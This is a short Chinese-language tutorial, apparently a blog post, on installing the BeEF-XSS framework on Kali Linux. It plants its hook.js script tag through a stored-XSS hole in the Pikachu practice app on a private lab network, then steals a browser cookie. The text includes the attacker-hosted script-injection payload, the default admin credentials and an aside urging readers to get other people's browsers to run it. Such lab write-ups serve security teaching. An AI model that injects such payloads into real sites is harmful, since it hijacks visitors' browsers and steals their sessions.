kali安装与更新软件源
beef-xss安装
- sudo apt-get install beef-xss
- sudo beef-xss
- 第一次启动beef要修改密码,要仔细看清楚
快速上手beef-xss
http://127.0.0.1:3000/ui/panel
beef的管理面板
输入自己的账号密码默认beef beef
这样就能进入到管理页面
查看kali的ip地址
构造下面js代码,想办法给其他人的浏览器去执行
<script src=“http://192.168.159.157:3000/hook.js”></script>(ip用你自己kali的ip)
这里只展示一种方法
把<script src=“http://192.168.159.157:3000/hook.js”></script>放在有存储型xss漏洞的网页里,等肉鸡去访问就可以了
这里利用pikachu的存储型漏洞
虚拟机kali ip 192.168.159.157
虚拟机pikachu服务器ip 192.168.159.132
我自己本机ip 192.168.159.1
本机提交<script src=“http://192.168.159.157:3000/hook.js”></script>到留言板
提交之后,beef管理面板多出了一台肉鸡(是我自己的真机)和Current Brower当前浏览器的选项
这里主要使用Commands下的Browser模块进行获取信息
简单获取个cookie
到logs查看结果,需要点击以下刷新图标,可以看到成功获取cookie
这里我删除了留言
查看beef管理面板,之前在线的主机已经不见了,offline(离线)主机多出一台
主机浏览别的页面,beef面板也会显示主机离线
结论:主机要在那串代码的地方才会被控制(可能有其他方法维持会话我不知道而已把)
关闭beef-xss进程
当然还有很多功能这里先不介绍,以后有时间写篇文章详细介绍